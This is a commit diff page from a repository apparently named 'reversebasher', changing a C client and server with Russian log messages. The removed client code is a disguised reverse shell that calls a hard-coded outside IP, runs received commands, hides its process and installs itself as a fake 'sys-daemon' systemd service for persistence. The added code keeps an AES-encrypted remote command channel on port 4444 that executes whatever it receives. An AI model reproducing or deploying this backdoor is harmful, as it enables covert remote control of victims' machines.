lain/reversebasher
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

letsgo

Browse Source
This commit is contained in:
wheelchairy 2025-02-10 14:44:43 +03:00
parent 95fef97809
commit 64e77a20f1
2 changed files with 95 additions and 92 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

128
client.c
View File

@ -2,102 +2,90 @@
#include <stdlib.h> #include <stdlib.h>
#include <string.h> #include <string.h>
#include <unistd.h> #include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h> #include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h> #include <arpa/inet.h>
#include <netinet/in.h> #include <openssl/evp.h>
#include <openssl/aes.h>
#include <openssl/sha.h> #include <openssl/sha.h>
#include <openssl/rand.h>
#define SERVER_IP "212.113.119.5" #define SERVER_IP "212.113.119.5"
#define PORT_MIN 2000 #define PORT 4444
#define PORT_MAX 3000
#define AES_KEY_SIZE 16 #define AES_KEY_SIZE 16
#define AES_BLOCK_SIZE 16
unsigned char AES_KEY[AES_KEY_SIZE]; unsigned char key[AES_KEY_SIZE];
void generate_aes_key() { void generate_aes_key() {
FILE *fp = popen("cat /sys/class/dmi/id/product_uuid", "r"); FILE *fp = popen("cat /sys/class/dmi/id/product_uuid", "r");
char buffer[256]; char buffer[256];
if (fp == NULL || fgets(buffer, sizeof(buffer), fp) == NULL) { if (fp == NULL || fgets(buffer, sizeof(buffer), fp) == NULL) {
pclose(fp); pclose(fp);
RAND_bytes(AES_KEY, AES_KEY_SIZE); RAND_bytes(key, AES_KEY_SIZE);
} else { } else {
pclose(fp); pclose(fp);
SHA256((unsigned char *)buffer, strlen(buffer), AES_KEY); SHA256((unsigned char *)buffer, strlen(buffer), key);
} }
} }
void encrypt(char *input, char *output) { void encrypt_data(unsigned char *plaintext, unsigned char *ciphertext) {
AES_KEY enc_key; EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
AES_set_encrypt_key(AES_KEY, 128, &enc_key); int len, ciphertext_len;
AES_encrypt((unsigned char *)input, (unsigned char *)output, &enc_key); unsigned char iv[AES_BLOCK_SIZE] = {0};
EVP_EncryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, iv);
EVP_EncryptUpdate(ctx, ciphertext, &len, plaintext, strlen((char *)plaintext));
ciphertext_len = len;
EVP_EncryptFinal_ex(ctx, ciphertext + len, &len);
ciphertext_len += len;
EVP_CIPHER_CTX_free(ctx);
} }
void decrypt(char *input, char *output) { void decrypt_data(unsigned char *ciphertext, unsigned char *plaintext) {
AES_KEY dec_key; EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
AES_set_decrypt_key(AES_KEY, 128, &dec_key); int len, plaintext_len;
AES_decrypt((unsigned char *)input, (unsigned char *)output, &dec_key); unsigned char iv[AES_BLOCK_SIZE] = {0};
}
void hide_process() { EVP_DecryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, iv);
setsid(); EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, strlen((char *)ciphertext));
chdir("/"); plaintext_len = len;
fclose(stdin); EVP_DecryptFinal_ex(ctx, plaintext + len, &len);
fclose(stdout); plaintext_len += len;
fclose(stderr);
}
void persist() { plaintext[plaintext_len] = '\0';
char path[128], dest[128]; EVP_CIPHER_CTX_free(ctx);
snprintf(path, sizeof(path), "/proc/%d/exe", getpid());
snprintf(dest, sizeof(dest), "/usr/local/bin/sys-daemon");
if (access(dest, F_OK) != 0) {
system("cp /proc/self/exe /usr/local/bin/sys-daemon");
system("chmod +x /usr/local/bin/sys-daemon");
system("echo '[Unit]\nDescription=System Daemon\nAfter=network.target\n[Service]\nExecStart=/usr/local/bin/sys-daemon\nRestart=always\n[Install]\nWantedBy=multi-user.target' > /etc/systemd/system/sys-daemon.service");
system("systemctl enable sys-daemon.service && systemctl start sys-daemon.service");
}
}
void reverse_shell(int port) {
int sock;
struct sockaddr_in server;
char buffer[1024], encrypted[1024], decrypted[1024];
sock = socket(AF_INET, SOCK_STREAM, 0);
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr(SERVER_IP);
server.sin_port = htons(port);
if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) {
close(sock);
return;
}
while (1) {
recv(sock, encrypted, sizeof(encrypted), 0);
decrypt(encrypted, decrypted);
FILE *fp = popen(decrypted, "r");
fread(buffer, 1, sizeof(buffer), fp);
pclose(fp);
encrypt(buffer, encrypted);
send(sock, encrypted, sizeof(encrypted), 0);
}
close(sock);
} }
int main() { int main() {
generate_aes_key(); generate_aes_key();
persist(); printf("[+] AES-ключ клиента сгенерирован\n");
hide_process();
int port = PORT_MIN + (rand() % (PORT_MAX - PORT_MIN + 1)); int sock;
reverse_shell(port); struct sockaddr_in server;
unsigned char buffer[1024], encrypted[1024], decrypted[1024];
sock = socket(AF_INET, SOCK_STREAM, 0);
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr(SERVER_IP);
server.sin_port = htons(PORT);
if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) {
close(sock);
return 1;
}
while (1) {
printf("Shell> ");
fgets(buffer, sizeof(buffer), stdin);
encrypt_data(buffer, encrypted);
send(sock, encrypted, sizeof(encrypted), 0);
recv(sock, encrypted, sizeof(encrypted), 0);
decrypt_data(encrypted, decrypted);
printf("%s\n", decrypted);
}
close(sock);
return 0; return 0;
} }

59
server.c
View File

@ -4,15 +4,15 @@
#include <sys/socket.h> #include <sys/socket.h>
#include <arpa/inet.h> #include <arpa/inet.h>
#include <unistd.h> #include <unistd.h>
#include <openssl/aes.h> #include <openssl/evp.h>
#include <openssl/sha.h> #include <openssl/sha.h>
#include <openssl/rand.h>
#define PORT_MIN 2000 #define PORT 4444
#define PORT_MAX 3000
#define AES_KEY_SIZE 16 #define AES_KEY_SIZE 16
#define SERVER_IP "212.113.119.5" #define AES_BLOCK_SIZE 16
unsigned char AES_KEY[AES_KEY_SIZE]; // Хранение AES-ключа unsigned char key[AES_KEY_SIZE];
void generate_aes_key() { void generate_aes_key() {
FILE *fp = popen("cat /sys/class/dmi/id/product_uuid", "r"); FILE *fp = popen("cat /sys/class/dmi/id/product_uuid", "r");
@ -20,23 +20,40 @@ void generate_aes_key() {
if (fp == NULL || fgets(buffer, sizeof(buffer), fp) == NULL) { if (fp == NULL || fgets(buffer, sizeof(buffer), fp) == NULL) {
pclose(fp); pclose(fp);
printf("[-] Не удалось получить UUID, используем случайный ключ\n"); printf("[-] Не удалось получить UUID, используем случайный ключ\n");
RAND_bytes(AES_KEY, AES_KEY_SIZE); RAND_bytes(key, AES_KEY_SIZE);
} else { } else {
pclose(fp); pclose(fp);
SHA256((unsigned char *)buffer, strlen(buffer), AES_KEY); SHA256((unsigned char *)buffer, strlen(buffer), key);
} }
} }
void encrypt(char *input, char *output) { void encrypt_data(unsigned char *plaintext, unsigned char *ciphertext) {
AES_KEY enc_key; EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
AES_set_encrypt_key(AES_KEY, 128, &enc_key); int len, ciphertext_len;
AES_encrypt((unsigned char *)input, (unsigned char *)output, &enc_key); unsigned char iv[AES_BLOCK_SIZE] = {0};
EVP_EncryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, iv);
EVP_EncryptUpdate(ctx, ciphertext, &len, plaintext, strlen((char *)plaintext));
ciphertext_len = len;
EVP_EncryptFinal_ex(ctx, ciphertext + len, &len);
ciphertext_len += len;
EVP_CIPHER_CTX_free(ctx);
} }
void decrypt(char *input, char *output) { void decrypt_data(unsigned char *ciphertext, unsigned char *plaintext) {
AES_KEY dec_key; EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
AES_set_decrypt_key(AES_KEY, 128, &dec_key); int len, plaintext_len;
AES_decrypt((unsigned char *)input, (unsigned char *)output, &dec_key); unsigned char iv[AES_BLOCK_SIZE] = {0};
EVP_DecryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, iv);
EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, strlen((char *)ciphertext));
plaintext_len = len;
EVP_DecryptFinal_ex(ctx, plaintext + len, &len);
plaintext_len += len;
plaintext[plaintext_len] = '\0';
EVP_CIPHER_CTX_free(ctx);
} }
int main() { int main() {
@ -46,32 +63,30 @@ int main() {
int server_sock, client_sock; int server_sock, client_sock;
struct sockaddr_in server, client; struct sockaddr_in server, client;
socklen_t client_size = sizeof(client); socklen_t client_size = sizeof(client);
char buffer[1024], encrypted[1024], decrypted[1024]; unsigned char buffer[1024], encrypted[1024], decrypted[1024];
int port = PORT_MIN + (rand() % (PORT_MAX - PORT_MIN + 1));
server_sock = socket(AF_INET, SOCK_STREAM, 0); server_sock = socket(AF_INET, SOCK_STREAM, 0);
server.sin_family = AF_INET; server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY; server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(port); server.sin_port = htons(PORT);
bind(server_sock, (struct sockaddr *)&server, sizeof(server)); bind(server_sock, (struct sockaddr *)&server, sizeof(server));
listen(server_sock, 1); listen(server_sock, 1);
printf("[+] Сервер слушает на порту %d...\n", port); printf("[+] Сервер слушает на порту %d...\n", PORT);
client_sock = accept(server_sock, (struct sockaddr *)&client, &client_size); client_sock = accept(server_sock, (struct sockaddr *)&client, &client_size);
printf("[+] Подключение от %s\n", inet_ntoa(client.sin_addr)); printf("[+] Подключение от %s\n", inet_ntoa(client.sin_addr));
while (1) { while (1) {
recv(client_sock, encrypted, sizeof(encrypted), 0); recv(client_sock, encrypted, sizeof(encrypted), 0);
decrypt(encrypted, decrypted); decrypt_data(encrypted, decrypted);
printf("Команда: %s\n", decrypted); printf("Команда: %s\n", decrypted);
FILE *fp = popen(decrypted, "r"); FILE *fp = popen(decrypted, "r");
fread(buffer, 1, sizeof(buffer), fp); fread(buffer, 1, sizeof(buffer), fp);
pclose(fp); pclose(fp);
encrypt(buffer, encrypted); encrypt_data(buffer, encrypted);
send(client_sock, encrypted, sizeof(encrypted), 0); send(client_sock, encrypted, sizeof(encrypted), 0);
} }